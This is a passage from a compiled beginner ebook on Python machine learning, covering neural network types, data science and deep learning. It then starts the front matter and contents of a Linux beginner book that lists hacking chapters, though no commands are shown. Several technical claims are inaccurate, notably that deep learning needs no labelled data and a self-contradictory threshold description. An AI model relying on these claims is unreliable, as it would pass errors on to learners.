purposes and also applicable in the formation of URLs used on the web.
From the beginning, it was to assist in data scrapping. However, this has
undergone several evolutions and led to the expansions of its general
purpose. Therefore, the main task of the scrappy library in our present-day is
to act as crawlers for general use. The library led to the promotion of general
usage, application of universal codes, and so on.
Statsmodels
Statsmodels is a library with the aim of data exploration using several
methods of statistical computations and data assertions. It has many features
such as result statistics and even characteristic features. It can undertake this
role with the help of the various models such as linear regression, multiple
estimators, and analysis involving time series, and even using more linear
models. Also, other models, such as discrete choice are applicable here.
Benefits of Applying Python in Machine Learning
Programming
For machine learning algorithms, we must have a programming language that
is clear and easy to be understood by a large portion of data researchers and
scientists. A language with libraries that are useful for different types of work
and in matrix math in specific will be preferable. Moreover, it is of a very
good advantage to use a language with a large number of active developers.
These features make Python the best choice. The main advantages of Python
can be summarized in the following points:

1. Its syntax is clear.


2. Easy to manipulate texts.
3. It is used by a high number of people and communities.
4. Possibility of programing in different styles: object-oriented,
procedural, functional, etc.
5. Ideal for processing non-numeric data.
6. Ability to extract data from HTML.
7. Common in the scientific and also the financial communities.
Therefore, there is a seamless connection between the two
fields, especially in machine learning, as the financial field is
one of the main sources of the datasets.
8. Contains useful libraries such as SciPy and NumPy which
enables us to perform operations on vectors and matrices.
Chapter 10 Artificial Neural Networks
Over time, the human brain adapted and developed as part of the evolution
process. It became better after it modified many characteristics that were
suitable and useful. Some of the qualities that enhanced the brain include
learning ability, fault tolerance, adaptation, massive parallelism, low energy
utilization, distributed representation and computation, generalization ability,
and innate contextual processing of information.
The aim of developing artificial neural networks is the hope that the systems
will have some of these features in their possession. Human beings are
excellent at solving complicated perceptual issues such as identifying a
person in a crowded area from just a glimpse almost instantaneously.
On the other hand, computer systems calculate numerically and manipulate
the related symbols at super-speed rates. This difference shows how the
biological and artificial information processing varies, and a person can study
both systems to learn how to improve artificial neural networks best.
These networks seek to apply some organizational elements that the human
brain uses, such as learning ability and generalization skills, among others.
Thus, it is also essential for a person to have some understanding of
neurophysiology and cognitive science. It will help them to comprehend
artificial neural networks that seek to mirror how the brain works to function
effectively.
Here, we have the information regarding the types, layers, as well as the
advantages and disadvantages of artificial neural networks. Read on to find
out how artificial neural systems function in the machine learning process.
Introduction to Artificial Neural Networks
Artificial neural networks are one of the vital tools that a person uses in
machine learning. They refer to the materially cellular systems or
computational algorithms that can obtain, store, and use experimental
knowledge. These systems show the similarities that exist between the
functioning styles of artificial neural networks and the human information
processing system.
The biological neural networks inspire the design and development of
artificial neural systems. People use artificial neural networks to solve several
issues such as prediction, associative memory, optimization, recognition, and
control. As a result, the neural systems consist of a high number of linked
units of processing which operate together to process information and
produce significant results.
The human brain comprises millions of neurons that process and send cues
by using chemical and electrical signals. Synapses are specific structures that
connect neurons and permit messages to pass between them. The neural
networks form a significant number of simulated neurons. Similarly, artificial
neural systems have a series of interlinked neurons that compute values from
inputs.
They use a vast number of linked processing units, which act as neurons, to
accomplish information processing. The numerous groups of units form the
neural networks in the computational algorithm. These networks comprise
input and output layers, along with hidden layers, which can change the input
into that which an output layer can utilize.
Artificial neural networks are perfect instruments for identifying patterns that
are too complex for a person to retrieve and teach the computer to recognize.
It can also classify a significant amount of data after a programmer carefully
trains it. In this case, deep learning neural networks provide classification.
Afterward, the programmer uses backpropagation to rectify mistakes that
took place in the classification process.
Backpropagation is a method that an individual uses to calculate the gradient
failure or loss function. Deep learning networks provide multilayer systems
that identify and extract certain relevant elements from the inputs and
combine them to produce the final significant output. It uses complex
detection of features to recognize and classify data as needed by the user. The
programmers who train the networks label the outputs before conducting
backpropagation.
Therefore, artificial neural networks are the computational models that use
the biological central nervous system as a blueprint and inspiration.
Understanding neural networks enable a person to discover and comprehend
the similarities that exist. It also allows them to note the differences that exist
between the artificial and biological intelligence systems. They also know
how they can apply the suitable characteristics to improve and optimize
information and function.
Types of Artificial Neural Networks
Artificial Neural Networks are computational algorithms that draw
inspiration from the human brain to operate. Some types of networks employ
mathematical processes along with a group of parameters to establish output.
The different kinds of neural networks are:
Kohonen Self Organizing Neural Network
This type of system uses Kohonen's self-organizing neural map to visualize
and classify data of high dimensions. The neural network forms a layout from
the N-dimensional space into the neurons, that is, units place. In this case, the
N-dimensional space is arbitrary. The map maintains the topological
connections of a random dimensional scope. The U-matrix method visualizes
designs or systems in the N-dimensional space. It also identifies irregularities
in the layout that this network provides.
A programmer trains the mapping that the network produces and enables it to
form its arrangement of training or teaching data. During the training process,
the value determines how the weights differ while the neuron stays
unchanged. The first phase of the self-organizing process consists of the
initialization of each neuron value by the input vector and small weight. The
second phase comprises the winning neurons, which are those that are nearest
to a point. Other neurons linked with these winning one also proceed towards
the spot. The Euclidean distance calculates the distance between the neurons
and the point where the minimum distance produces the winner. Recurrence
leads to clustering of the places and every neuron symbolizes every type of
cluster.
A person can apply Kohonen's self-organizing neural network to cluster data
because it can identify the limits between various subgroups of data. One
uses association to categorize new inputs. This neural system also enables a
user to acquire knowledge and analyze exploratory data. One uses it to
identify data and analyze cluster data into various classifications with
accuracy.
Feedforward Neural Network – Artificial Neuron
This type is among the most accessible forms of neural networks because the
data moves in a single direction. The data goes through the input nodes and
comes out of the output ones. Feedforward neural network type does not have
backpropagation and only possesses front propagation. As a result, there may
or may not be hidden layers in its possession. It also usually uses an
activation function for classifying purposes.
The system calculates the totality of the products of weights and inputs and
feeds that sum to the output. The output produced is activated or deactivated,
depending on the values on the threshold. This boundary is usually zero, and
if the value is equal to or above one, the neuron discharges an activated
output. On the other hand, if the product is below zero, the neuron does not
release it, and instead, the network sends out the deactivated value.
The Feedforward Neural Network responds to noisy input, and it is easy to
sustain. It exists in speech and vision recognition features of a computer
because it classifies complicated target classes.
Radial Basis Function Neural Network
This neural system looks at a point’s distant concerning the center, and it
consists of two layers. The features initially join with the Radial Basis
Function that exists in the inner layer. The system takes into account the
resulting outputs of the elements concerned while processing the same
product in the subsequent step, which is the memory. One can use the
Euclidean method to measure the distances of interest.
This neural network classifies the points into various groups according to the
circle's radius or the highest reach. The closer the point is to the range of the
ring, the more likely the system will categorize that new point into that
particular class. The beta function controls the conversion that sometimes
takes place when there is a switch from one region to another.
The most prominent application of the Radial Function Neural Network is in
Power Restoration Systems, which are enormous and complex. The network
restores power quickly in an orderly manner where urgent clients like
hospitals receive power first, followed by the majority and lastly the common
few. The restoration goes following the arrangement of the power lines and
the customers within the radius of the tracks. The first line will resolve power
outage among the emergency clients, the second one will fix the power for
the majority, and the last one will deal with the remaining few.

Recurrent Neural Network – Long Short Term Memory


The Recurrent neural network uses the idea where it saves the output of the
layer and then feeds it back into the input. It seeks to assist in providing
predictions concerning the outcome or result of the stratum. This type of
neural network takes place in some models, such as the text to speech
conversion prototypes. In this case, the system first changes the text into a
phoneme.
A synthesis or combining audio model then converts it into speech. The
initial process used texting as input which resulted in a phonological sound as
the output. The network then reutilized the output phoneme and inputted it
into the system, which produced the outcome that was the speech.
Neurons in Recurrent neural networks perform like memory cells while
carrying out computations. Each neuron remembers some details or data that
it possessed in the preceding time-step. Thus, the more the information passes
from one neuron to the next, the more knowledge a neuron recalls. The
system works using the front propagation and recollects which knowledge it
will require for future use.
In case the prediction that the network makes is wrong, a person utilizes
backpropagation. They correct errors and employ the learning rate to create
small modifications. These alterations will guide the system to make correct
predictions. It is essential also to note that the sum of the features and weights
produce the outputs, which create the first layer of the Recurrent Neural
Network type.
Convolutional Neural Network
This neural network type can receive an input image and attribute importance
to different features or items in the representation. Afterward, it can manage
to distinguish one figure from another. Convolutional neural networks require
less pre-processing in comparison to other algorithms used in classification.
The different methods need to utilize filters that a programmer engineers by
hand. In contrast, the deep learning algorithms of this neural network type
have the capability of learning the necessary filters or qualities.
The structure of the Convolutional neural network gets its inspiration from
the formation and structure of the Visual cortex in the brain. Its organization
is similar to the patterns of connection of neurons in the human brain. The
single neurons react to stimuli only in a confined region of the optical area
called the Receptive field. A group of this field covers the whole visual area
by overlapping.
The neural network type, therefore, uses relevant filters to fit the image data
collection better and consequently comprehend more the complexity of an
image. The screens refer to the system taking in the input features in batches
which help it to recall the image in sections and compute processes. The
system carries out appropriate screening and reduces the number of
frameworks concerned as well as enables the recycling of weights. As a
result, the Convolutional neural network type can obtain the Temporal and
Spatial dependencies effectively.
This neural system has biases and learn-able weights in their neurons that
enable a person to use it in the processing of signals and images in the
computer vision area. The computation process includes converting an image
to Gray-scale from a HIS or RGB scale. This conversion changes the value of
the pixel, which in turn assists in identifying the edges. It then enables the
classification of images into various categories. Techniques in computer
vision utilize this neural network significantly because it processes signals
and provides accurate image classification.

Modular Neural Network


This neural system type has a group of various networks that work
individually to supply to the output. They do not transmit signals to one
another while carrying out the necessary tasks. Every neural system contains
a collection of inputs that are exclusive to the related network. Thus, the
structures do not interact with each other in any way while they work to
create and perform the assigned sub-duties. They reduce the sophistication of
a process by breaking it down into sub-tasks. It leads to the network
functioning without interacting with one another because the amount of links
between the processes lessens.
As a result, efficiency in the accomplishment of the sub-tasks leads to an
increased speed of the computation process. Nevertheless, the time it takes to
complete the process is contingent on the number of neurons and their
engagement in the computation of results.
Artificial Neural Network Layers
Three layers make up the Artificial Neural Networks. These layers are the
input, hidden, and output ones. Numerous interlinked nodes form each one of
these layers, and the nodes possess an activation function, which is an output
of a specific input.
Input Layer
This layer takes in the values of the descriptive qualities for every
observation. It offers the patterns to the system that communicate to the
hidden layers. The nodes in this layer do not modify the data because they are
passive. It duplicates every value that it receives and sends them onto the
hidden nodes. Additionally, the number of descriptive variables is the same
as the number of nodes present in this layer.

Hidden Layer
This layer utilizes a structure of weighted links to process values. It
multiplies the values getting into the stratum by weights and then adds the
weighted inputs to obtain a single number. The weighting, in this case, refers
to a group of preset numbers that the program stores. The hidden layer
implements particular conversions to the input values in the system.
Output Layer
This layer obtains links from the input layer or the hidden layer and provides
an output that matches the prediction of the feedback variable. The selection
of suitable weights leads to the layer producing relevant manipulation of data.
In this layer, the active nodes merge and modify the data to generate the
output value.
Conclusively, the input layer includes input neurons that convey information
to the hidden layer. The hidden layer then passes the data on to the output
layer. Synapses in a neural network are the flexible framework or boundaries
that transform a neural system into a parameterized network. Hence, every
neuron in the neural network contains balanced inputs, activation functions,
and an output. The weighted data represent the synapses while the activation
function establishes the production in a particular entry.
Advantages and Disadvantages of Neural Networks
There are some advantages and disadvantages to using Artificial Neural
Networks. Understanding them can enable one to comprehend better the
operations and shortcomings involved in the neural networks.
Advantages of Artificial Neural Networks
The following are the advantages of Artificial Neural Networks, which help a
person to learn the benefits of using the neural systems.
a) Ability to Make Machine Learning – Artificial neural systems learn
circumstances and events, and decide by remarking on similar occurrences.
b) Ability to Work with Incomplete Knowledge – Proper training enables
the network to provide output even when the information is insufficient or
incomplete.
c) Having a Distributed Memory – A programmer uses examples to teach
the neural network and get it to produce desired outputs. They train the neural
system by the desired outcome by utilizing as many details as possible. The
example comprises of all the information and sections necessary to ensure
that the network will learn the most. This training provides the system with a
memory that has different relevant details that will allow for the production
of suitable outputs. The better the example in the training process is, the less
likely the neural network is to provide false outputs.
d) Parallel Processing Capability – The networks can carry out several
jobs at the same time due to their numerical advantage. They process several
numerics simultaneously and at a high speed.
e) Storing Information on the Entire Network – The system stores
information on the whole network and not in databases. It enables the system
to continue operating even in cases where a section loses some information
details.
f) Having Fault Tolerance – The network is fault-tolerant in that it can
carry on providing output even in situations where one or more cells decay.
g) Gradual Corruption – Degradation in the network does not take place
abruptly and instantly. It occurs slowly and progressively over a period,
which allows one to use the system despite the corrosion still.

Disadvantages of Artificial Neural Networks


Below are a few difficulties associated with Artificial Neural Networks. They
indicate the downside of a person utilizing the system.
a) The difficulty of showing the Issue to the Network – This neural system
only deals with information in numerical form. The user must, therefore,
convert problems in numerical values to utilize the network. The user may
find it challenging to transform the display mechanism as needed.
b) Dependence on Hardware – The neural networks depend on hardware
with parallel processing ability, without which they cannot function.
c) The Duration of the Network is Unidentified – The system signals the
completion of training when the network drops to a particular error value on
the example. The estimate does not represent the optimal results.
d) Unexplained Behavior of the Network – There is decreased trust in the
network because it provides solutions for an inquisition without an
accompanying explanation.
e) Determining the Proper Network Structure – Relevant neural systems
form through experiments and experiences. There is no set rule for
establishing an appropriate network structure.
In conclusion, Artificial Neural Networks are a crucial tool in Artificial
Intelligence and machine learning. A person needs to understand what the
neural system means and how it functions. The types of networks indicate
how the network operates in different circumstances while the layers show
how data moves in this neural system. The advantages and disadvantages also
inform a user about the highs and lows of the networks. The information
above provides significant knowledge that a person can use to learn about
Artificial Neural Networks. Subsequently, they can employ it in their
application of the systems.
Chapter 11 Data Science

One of the main reasons that we have spent so much of our time taking a look
at machine learning and what we are able to do with it along with Python is
that we want to be able to use this to help us out with data science. Many
companies are diving into the idea of data science and all that this method is
able to do for them, and whether your business is looking to expand to a new
area or you would like to reach more customers or release a new product,
data science will be able to help you out.
Now, there are going to be a few different steps that come with data science
in order to make sure that it is as successful as possible. But overall, it is
going to consist of many machine learning and Python algorithms that will
help us to take our prepared data, and organize it in a way that we are able to
use later on. But there is definitely a lot more that we are able to do with the
help of data science, and we are going to spend a bit of time exploring that
now. In this chapter, we are going to look at a few important steps in this
process including the basics of what data science is all about, how deep
learning comes into play, and how data preparation can be the tool we need
as well.
What is Data Science?
The first topic that we are going to spend some time on here is all about data
science. Data science, to keep things simple, is just a very detailed study that
shows us the flow of information from a large amount of data that a company
has gathered and collected in the hopes of learning something from. In our
modern world, there is information no matter which way we turn. Companies
are able to use this data, and simply by setting up their accounts on social
media or using other methods, they can collect a lot of data from their
customers, and use this in many different manners.
While gathering up all of this different information is important, and may
seem like the only thing a company needs to do, the problem is going to
really show up when we try to figure out the steps that we should take with
all of that data. It doesn’t do us a lot of good to just hold onto that
information without an idea of what we are able to do with it, or even any
ideas on what we will be able to find inside of that data. And because there is
a lot of data, usually more than we realize when we get started, it is hard for
us to simply assign a person, or even a team, to look through that data, and
efficiently and quickly find the patterns and insights that are in that set of
data.
Data science is here in order to handle this kind of problem. It is going to step
in to help us figure out what is found in the information, and even how to
store the information. And with the help of artificial intelligence and machine
learning, which we will talk about a bit later, we will find that data science
will be able to go through the information and find what trends are there,
especially the ones that are hidden.
When it comes to data science, we are going to be able to obtain some
meaningful insights from raw and unstructured data, which is then going to
be processed through skills that are business, programming, and analytical.
Let’s take a look at more about what this data science is all about, why it is
important, and some of the different parts of the data science cycle.
Right now, each day we are going to see 25 quintillion bytes of data
generated for companies to use, and it is going to grow at an even faster rate
as IoT continues to grow this is an extraordinary amount of growth in data,
which can be useful for a lot of companies to learn about their customers,
figure out the best products to release next, and work the best with the
customer service they would like to provide. All of this data is going to come
from a variety of sources that will include:

1. Sensors are set up in shopping malls in order to gather up the


information of the individual shopper.
2. Posts on the various platforms of social media can send back
information to the company.
3. Videos that are found on our phones and digital pictures are
taking in more data than ever before.
4. Companies are able to even get some good information when
they look at some of the purchase transactions that come when
people shop online and through e-commerce.
Think about how much data this can end up producing for us. No matter
where the data comes from though, it is going to be known as big data. As we
can imagine here, from all of the different sources of data, companies are
going to be flooded and dealing with more data than they really know how to
handle. And it is impossible for an individual to go through and do this work
on their own. That is why it is going to be important for us to learn the best
methods to use in order to handle the data and make it work for our needs.
When this happens, we are better able to use that data and all of the
information inside to make some smarter business decisions to lead us on.
It is at this part where we see the idea of data science showing up more and
more in the picture. Data science is going to bring together a variety of skills
that are necessary for success in the world of business, including business
domain knowledge, statistics, and mathematics. All of these are going to be
important to our process because they are going to help an organization out in
many ways. It is likely that we are yet to know all of the ways that these are
going to help out a business in the future, but some of the ways that
companies are able to use this data right here and now will include:

1. Helping the company learn new ways where they can reduce
costs each day.
2. It can help the company figure out the best method to take to
get into a new market that will be profitable for them.
3. This can help the company learn about a variety of
demographics and how to tap into these
4. It can help the company to take a look at the marketing
campaign that they sent out there and then figure out if the
marketing campaign was actually effective.
5. It can make it easier for the company to successfully launch a
new service product.
We have already spent some time taking a look at the lifecycle that comes
with data science, but to help us learn more about it, and to have a review,
let’s go over the steps. We will need to come up with the main business
problem that we would like to solve and then begin collecting the data that
we want to use. Since this data is going to be found in a lot of different
locations, we will be able to format it, clean it off, and make sure that the
outliers, duplicates, and missing values are taken care of.
From there, we are able to deal with the data through an algorithm. With the
help of the Python coding language and all of the features that it is able to
provide, we will see that there are a ton of algorithms that work well for this
process. We can choose the one that we need, and then do some training and
testing of the information ahead of time to make sure it is ready for making
predictions. We can then finish off the whole thing with some visualizations
that make it easier to see some of the complex relationships and correlations
that happen inside of our data.
From there, we need to move on to some of the components that will show up
in our data science project. There are a lot of components that need to come
together and need to work together to ensure we are actually able to get the
most out of any data science project we are working with.
The first component that we need to spend some time on is to pay attention to
the types of data that we are working with. The raw data that we have is so
important because it is going to be the foundation for all of the other things
that we do through this process. The two main types of data that you are
going to be able to find through this process though will be the structured
data, which is the kind we find in some tabular forms or a data set. And then
we can also have a type of data that is known as unstructured which will
include images, videos, emails, and PDF files to name a few.
The second components that we are going to find when we look at data
science are programming. You have to come up with some programming in
order to make those mathematical models that we talked about earlier and to
get them to really sort through the information and make predictions. All of
the analysis and management of the data is going to be done by computer
programming. The two most popular languages that are used in data science
will include R and Python so learning one of these can be helpful.
Next on the list is going to be probability and statistics. Data is going to be
manipulated in a manner that it is able to extract information and trends out
of that data. Probability and statistics are going to be the mathematical
foundation that brings it all together. Without having a good idea and a lot of
knowledge about these two topics, it is possible that you will misinterpret the
data, and will come up with conclusions that are not correct. This is a big
reason why probability and statistics are going to be so important to the world
of data science.
We also have to take a look at the idea of machine learning when we are
looking at data science. When someone is working through all of that big
data and everything that is contained inside of it, they are also going to use a
lot of the algorithms that come with machine learning. This can include the
methods of classification and regression at the same time.
And the final key component that we need to spend some time on here is the
idea of big data. In the world we live in today, raw data is so important, but
we need to be able to take it and turn it into something that we are actually
able to use. There is a lot of good information in all of that data, but if it is
just sitting there, and we are not able to get all of that information out of it
that we need, then it is going to be worthless to us.
This is where the Python algorithms are really going to come into play. You
will find that when we pick out the algorithms and use the right ones, we can
take all of this raw data, the data that may be a mess, unorganized, and hard
to work with, and can actually turn it into something that we are able to use
and appreciate overall.
There are a lot of different things that we will be able to work with when it
comes to working with data science. There are a lot of parts that come with
data science though. We have to make sure that we know all of the different
parts of the data science process.
Chapter 12 A Quick Look at Deep Learning
Artificial intelligence is a field of study that has come up in many
conversations for years. A few years ago, this was a futuristic concept that
was propagated in movies and comic books. Through years of development
and research, we are currently experiencing the best of artificial intelligence.
In fact, it is widely expected that AI will help us usher in the new frontier in
computing.
Artificial intelligence might share some similarities with machine learning
and deep learning, but they are not the same thing. Many people use these
terms interchangeably without considering the ramifications of their
assumptions. Deep learning and machine learning are knowledge branches of
artificial intelligence. While there are different definitions that have been
used in the past to explain artificial intelligence, the basic convention is that
this is a process where computer programs are built with the capacity to
operate and function like a normal human brain would.
The concept of AI is to train a computer to think the same way a human brain
thinks and functions. In as far as the human brain is concerned, we are yet to
fully grasp the real potential of our brains. Experts believe that even the most
brilliant individuals in the world are unable to fully exhaust their brain
capacity.
This, therefore, creates a conundrum, because if we are yet to fully
understand and test the limits of our brains, how can we then build computing
systems that can replicate the human brain? What happens if computers learn
how to interact and operate like humans to the point where they can fully use
their brainpower before we learn how to use ours?
Ideally, the power behind AI or the limits of its thinking capacity is yet to be
established. However, researchers and other experts in the field have made
great strides over the years. One of the closest examples of AI that espouses
these values is Sophia. Sophia is probably the most advanced AI model in the
world right now. Perhaps given our inability to fully push the limits of our
brains, we might never fully manage to push the limits of AI to a point where
they can completely replace humans.
Machine learning and deep learning are two branches of artificial intelligence
that have enjoyed significant research and growth over the years. The
attention towards these frameworks especially comes from the fact that many
of the leading tech companies in the world have seamlessly implemented
them in their products, and integrated them into human existence. You
interact with these models all the time on a daily basis.
Machine learning and deep learning do share a number of features, but they
are not the same. Just as is the case with comparing these two with artificial
intelligence. In your capacity as a beginner, it is important to learn the
difference between these studies, so that you can seek and find amazing
opportunities that you can exploit and use to further your skills in the
industry. In a world that is continually spiraling towards increased machine
dependency, there are many job openings in machine learning and deep
learning at the moment. There will be so much more in the near future too, as
people rush to adapt and integrate these systems into their daily operations
and lives.
Deep Learning vs Machine Learning
Before we begin, it is important that you remind yourself of the basic
definitions or explanations of these two subjects. Machine learning is a
branch of artificial intelligence that uses algorithms to teach machines how to
learn. Further from the algorithms, the machine learning models need input
and output data from which they can learn through interaction with different
users.
When building such models, it is always advisable to ensure that you build a
scalable project that can take new data when applicable and use it to keep
training the model and boost its efficiency. An efficient machine learning
model should be able to self-modify without necessarily requiring your input,
and still provide the correct output. It learns from structured data available
and keeps updating itself.
Deep learning is a class of machine learning that uses the same algorithms
and functions used in machine learning. However, deep learning introduces
layered computing beyond the power of algorithms. Algorithms in deep
learning are used in layers, with each layer interpreting data in a different
way. The algorithm network used in deep learning is referred to as artificial
neural networks.
The name artificial neural networks gives us the closest iteration of what
happens in deep learning frameworks. The goal here is to try and mimic the
way the human brain functions, by focusing on the neural networks. Experts
in deep learning sciences have studied and referenced different studies on the
human brain over the years, which has helped spearhead research into this
field.
Problem Solving Approaches
Let’s consider an example to explain the difference between deep learning
and machine learning.
Say you have a database that contains photos of trucks and bicycles. How can
you use machine learning and deep learning to make sense of this data? At
first glance, what you will see is a group of trucks and bicycles. What if you
need to identify photos of bicycles separately from trucks using these two
frameworks?
To help your machine learning algorithm identify the photos of trucks and
bicycles based on the categories requested, you must first teach it what these
photos are about. How does the machine learning algorithm figure out the
difference? After all, they almost look alike.
The solution is in a structured data approach. First, you will label the photos
of bicycles and trucks in a manner that defines different features that are
unique to either of these items. This is sufficient data for your machine
learning algorithm to learn from. Based on the input labels, it will keep
learning and refine its understanding of the difference between trucks and
bicycles as it encounters more data. From this simple illustration, it will keep
searching through millions of other data it can access to tell the difference
between trucks and bicycles.
How do we solve this problem in deep learning?
The approach in deep learning is different from what we have done in
machine learning. The benefit here is that in deep learning, you do not need
any labeled or structured data to help the model identify trucks from bicycles.
The artificial neural networks will identify the image data through the
different algorithm layers in the network. Each of the layers will identify and
define a specific feature in the photos. This is the same method that our
brains use when we try to solve some problems.
Generally, the brain considers a lot of possibilities, ruling out all the wrong
ones before settling on the correct one. Deep learning models will pass
queries through several hierarchical processes to find the solution. At each
identification level, the deep neural networks recognize some identifiers that
help in distinguishing bicycles from trucks.
This is the simplest way to understand how these two systems work. Both
deep learning and machine learning however, might not necessarily be
applicable methods to tell these photos apart. As you learn about the
differences between these two fields, you must remember that you have to
define the problem correctly, before you can choose the best approach to
implement in solving it. You will learn how to choose the right approach at a
later stage in your journey into machine learning, which has been covered in
the advanced books in this series.
From the example illustrated above, we can see that machine learning
algorithms need structured data to help them tell the difference between
trucks and bicycles. From this information, they can then produce the correct
output after identifying the classifiers.
In deep learning, however, your model can identify images of the trucks and
bicycles by passing information through several data processing layers in its
framework. There is no need for structured data. To make the correct
prediction, deep learning frameworks depend on the output provided at every
data processing layer. This information then builds up and presents the final
outcome. In this case, it rules out all possibilities to remain with the only
credible solution.
From our illustrations above, we have learned some important facts that will
help you distinguish deep learning from machine learning as you learn over
the years. We can summarize this in the following points:
● Data presentation
The primary difference between machine learning and deep learning is
evident in the way we introduce data into the respective models. With
machine learning models, you will almost always need to use structured data.
However, in deep learning, the networks depend on artificial neural network
layers to identify unique features that help to identify the data.
● Algorithms and human intervention
The emphasis of machine learning is to learn from interacting with different
inputs and use patterns. From such interaction, machine learning models can
produce better output the longer it learns, and the more interaction it receives.
To aid this cause, you must also try to provide as much new data as possible.
When you realize that the output presented is not what you needed, you must
retrain the machine learning model to deliver a better output. Therefore, for a
system that should work without human intervention, you will still have to be
present from time to time.
In deep learning, your presence is not needed. All the nested layers within the
neural networks process data at different levels. In the process, however, the
model might encounter errors and learn from them.
This is the same way that the human brain works. As you grow up, you learn
a lot of important life skills through trial and error. By making mistakes, your
brain learns the difference between positive and negative feedback, and you
strive to achieve positive results whenever you can.
To be fair, even in deep learning, your input will still be required. You cannot
confidently assume that the output will always be perfect. This particularly
applies when your input data is insufficient for the kind of output you
demand from the model.
The underlying factor here is that both machine learning and deep learning
must all use data. The quality of data you have will make a lasting impact on
the results you get from these models. Speaking of data, you cannot just use
any data you come across. To use either of these models effectively, you
must learn how to inspect data and make sure you are using the correct
format for the model you prefer.
Machine learning algorithms will often need labeled, structured data. For this
reason, they are not the best option if you need to find solutions to
sophisticated problems that need massive chunks of data.
In the example we used to identify trucks from bicycles, we tried to solve a
very simple issue in a theoretical concept. In the real world, however, deep
learning models are applied in more complex models. If you think about the
processes involved, from the concepts to hierarchical data handling and the
different number of layers that data must pass through, using deep learning
models to solve simple problems would be a waste of resources.
While all these classes of AI need data to help in conducting the intelligence
we require, deep learning models need significantly wider access to data than
machine learning algorithms. This is important because deep learning
algorithms must prove beyond a reasonable doubt that the output is perfect
before it is passed.
Deep learning models can easily identify differences and concepts in the data
processing layers for neural networks only when they have been exposed to
millions of data points. This helps to rule out all other possibilities. In the
case of machine learning, however, the models can learn through criteria that
are already predetermined.
Different Use Cases
Having seen the difference between machine learning and deep learning,
where can these two be applied in the real world? Deep learning is a credible
solution in case you deal with massive amounts of data. In this case, you will
need to interpret and make decisions from such data, hence you need a model
that is suitable given your resource allocation.
Deep learning models are also recommended when dealing with problems
that are too complicated to solve using machine learning algorithms. Beyond
this, it is important to realize that deep learning models usually have a very
high resource demand. Therefore, you should consider deep learning models
when you have the necessary financial muscle and resource allocation to
obtain the relevant programs and hardware.
Machine learning is a feasible solution when working with structured data
that can be used to train different machine learning algorithms. There is a lot
of learning involved before the algorithms can perform the tasks requested.
You can also use machine learning to enjoy the benefits of artificial
intelligence without necessarily implementing a full-scale artificial
intelligence model.
Machine learning algorithms are often used to help or speed up automation
processes in businesses and industrial processes. Some common examples of
machine learning models in use include advertising, identity verifiers,
information processing, and marketing. These should help your business
position itself better in the market against the competition.
Conclusion
Now that we have come to the end of the book, I hope you have gathered a
basic understanding of what machine learning is and how you can build a
machine learning model in Python. One of the best ways to begin building a
machine learning model is to practice the code in the book, and also try to
write similar code to solve other problems. It is important to remember that
the more you practice, the better you will get. The best way to go about this is
to begin working on simple problem statements and solve them using the
different algorithms. You can also try to solve these problems by identifying
newer ways to solve the problem. Once you get a hang of the basic problems,
you can try using some advanced methods to solve those problems.
Thanks for reading to the end!
Python Machine Learning may be the answer that you are looking for when it
comes to all of these needs and more. It is a simple process that can teach
your machine how to learn on its own, similar to what the human mind can
do, but much faster and more efficient. It has been a game-changer in many
industries, and this guidebook tried to show you the exact steps that you can
take to make this happen.
There is just so much that a programmer can do when it comes to using
Machine Learning in their coding, and when you add it together with the
Python coding language, you can take it even further, even as a beginner.
The next step is to start putting some of the knowledge that we discussed in
this guidebook to good use. There are a lot of great things that you can do
when it comes to Machine Learning, and when we can combine it with the
Python language, there is nothing that we can’t do when it comes to training
our machine or our computer.
This guidebook took some time to explore a lot of the different things that
you can do when it comes to Python Machine Learning. We looked at what
Machine Learning is all about, how to work with it, and even a crash course
on using the Python language for the first time. Once that was done, we
moved right into combining the two of these to work with a variety of Python
libraries to get the work done.
You should always work towards exploring different functions and features
in Python, and also try to learn more about the different libraries like SciPy,
NumPy, PyRobotics, and Graphical User Interface packages that you will be
using to build different models.
Python is a high-level language which is both interpreter based and object-
oriented. This makes it easy for anybody to understand how the language
works. You can also extend the programs that you build in Python onto other
platforms. Most of the inbuilt libraries in Python offer a variety of functions
that make it easier to work with large data sets.
You will now have gathered that machine learning is a complex concept that
can easily be understood. It is not a black box that has undecipherable terms,
incomprehensible graphs, or difficult concepts. Machine learning is easy to
understand, and I hope the book has helped you understand the basics of
machine learning. You can now begin working on programming and building
models in Python. Ensure that you diligently practice since that is the only
way you can improve your skills as a programmer.
If you have ever wanted to learn how to work with the Python coding
language, or you want to see what Machine Learning can do for you, then
this guidebook is the ultimate tool that you need! Take a chance to read
through it and see just how powerful Python Machine Learning can be for
you.
LINUX FOR BEGINNERS:
THE PRACTICAL GUIDE TO
LEARN LINUX OPERATING
SYSTEM WITH THE
PROGRAMMING TOOLS FOR
THE INSTALLATION,
CONFIGURATION AND
COMMAND LINE + TIPS ABOUT
HACKING AND SECURITY.

JOHN S. CODE
© Copyright 2019 - All rights reserved.
The content contained within this book may not be reproduced,
duplicated or transmitted without direct written permission from
the author or the publisher.
Under no circumstances will any blame or legal responsibility be
held against the publisher, or author, for any damages, reparation,
or monetary loss due to the information contained within this book.
Either directly or indirectly.
Legal Notice:
This book is copyright protected. This book is only for personal
use. You cannot amend, distribute, sell, use, quote or paraphrase
any part, or the content within this book, without the consent of the
author or publisher.
Disclaimer Notice:
Please note the information contained within this document is for
educational and entertainment purposes only. All effort has been
executed to present accurate, up to date, and reliable, complete
information. No warranties of any kind are declared or implied.
Readers acknowledge that the author is not engaging in the
rendering of legal, financial, medical or professional advice. The
content within this book has been derived from various sources.
Please consult a licensed professional before attempting any
techniques outlined in this book.
By reading this document, the reader agrees that under no circumstances is
the author responsible for any losses, direct or indirect, which are incurred as
a result of the use of information contained within this document, including,
but not limited to, — errors, omissions, or inaccuracies.
Table of Contents
Introduction
Chapter 1 Basic Operating System Concepts, Purpose and
Function
Chapter 2 Basics of Linux
Chapter 3 What are Linux Distributions?
Chapter 4 Setting up a Linux System
Chapter 5 Comparison between Linux and other Operating
Systems
Chapter 6 Linux Command Lines
Chapter 7 Introduction to Linux Shell
Chapter 8 Basic Linux Shell Commands
Chapter 9 Variables
Chapter 10 User and Group Management
Chapter 11 Learning Linux Security Techniques
Chapter 12 Some Basic Hacking with Linux
Chapter 13 Types of Hackers
Conclusion
Introduction
If you have picked up this book, you are inevitably interested in Linux, at
least to some degree. You may be interested in understanding the software, or
debating whether it is right for you. However, especially as a beginner, it is
easy to feel lost in a sea of information. How do you know what version of
Linux to download? Or how to even go about downloading it, to begin with?
Is Linux even right for you to begin with? All of those are valid questions,
